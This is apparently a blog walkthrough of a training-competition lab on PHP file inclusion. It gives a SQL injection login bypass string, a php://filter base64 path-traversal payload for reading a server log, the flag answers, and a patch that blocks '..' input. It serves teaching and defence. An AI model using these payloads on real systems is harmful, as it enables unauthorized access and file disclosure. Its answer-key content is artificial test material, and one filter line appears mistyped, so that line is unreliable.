A114-经典赛题-Web应用程序文件包含安全攻防

孪生质数-2023-10-17 16:35

实验步骤:

Web应用程序文件包含安全攻防

任务环境说明:

服务器场景:WebServ2003(用户名:administrator;密码:空)

服务器场景操作系统:Microsoft Windows2003 Server

服务器场景安装服务/工具1:Apache2.2;

服务器场景安装服务/工具2:Php6;

服务器场景安装服务/工具3:Microsoft SqlServer2000;

服务器场景安装服务/工具4:EditPlus;

网络拓扑:01-WebServ2003--02-AttWinXp

windows server 2003

用户:administrator

密码:空

网络拓扑

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

实战

=========================================================================

访问WebServ2003服务器场景,"/"->" Display Uploaded's File Content",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name="变量名")提交

查看server2003的ip地址

访问2003的http服务

可以使用万能用户、任意密码登录(密码我直接随便按了几个)

复制代码 
' union select * from users--

点击Submit,成功进入。

点击倒数第二个,也就是 Display Uploaded's File Content

右键,查看源文件

找到变量名

本题提交Flag:【 name="filename"

=========================================================================

对该任务题目1页面注入点进行渗透测试,通过php://filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交

复制代码 
php://filter/read=convert.base64-encode/resource=../Apache2.2/logs/flag.log

本题提交Flag:【php://filter/read=convert.base64-encode/resource=../Apache2.2/logs/flag.log】

=========================================================================

对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交

本题提交Flag

V2l0aCBncmVhdCBwb3dlciBjb21lcyBncmVhdCByZXNwb25zaWJpbGl0eS4=

=========================================================================

通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交

输入php://filter/read=convert-encode/resource=../Apache2.2/logs/flag.log

复制代码 
php://filter/read=convert-encode/resource=../Apache2.2/logs/flag.log

本题提交Flag:【 With great power comes great responsibility.

进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);

首先注释下面这段代码

修改上面这段

修改点和参数:

F1:..

F2:strstr

F3:empty

F4:@readfile

修改后:

再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交

再次进行渗透

本题提交Flag

Illegal input!</br><a href='DisplayFile.php'>Display Uploaded's File Content</a></br>

=========================================================================

相关推荐
ZC跨境爬虫40 分钟前
3D 地球卫星轨道可视化平台开发 Day8(分步渲染200颗卫星+ 前端分页控制)
前端·python·3d·重构·html
zopple1 小时前
ThinkPHP5.x与3.x核心差异解析
java·python·php
飞飞传输2 小时前
国产化FTP替代方案哪个好?选对平台让传输更安全高效
大数据·运维·安全
大黄说说3 小时前
HTML5语义化标签:从div到article与section的进化之路
前端·html·html5
whyfail3 小时前
CVE-2026-39363-Vite开发服务器安全漏洞深度分析
安全·vite
Y学院3 小时前
网络安全基础核心知识点教程
网络·web安全·php
amao99883 小时前
系统安全-概述
安全·系统安全
阿赛工作室4 小时前
符合欧盟安全标准的 Node.js + Vue3 全栈架构设计
安全·node.js
QC·Rex4 小时前
Kubernetes 生产环境调试安全最佳实践:2026 年完整指南
安全·贪心算法·kubernetes
德迅云安全-小潘5 小时前
游戏行业网络安全态势分析与应对
安全·web安全·游戏
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free042026年4月AI大事件深度解读:大模型竞争进入“深水区“05Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07UBUNTU Claude Code 报错 claude native binary not installed08近期有什么ai的新消息,新动态? 2026.4月09从限购到畅通:GLM-5.1 Coding Plan接入攻略10从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程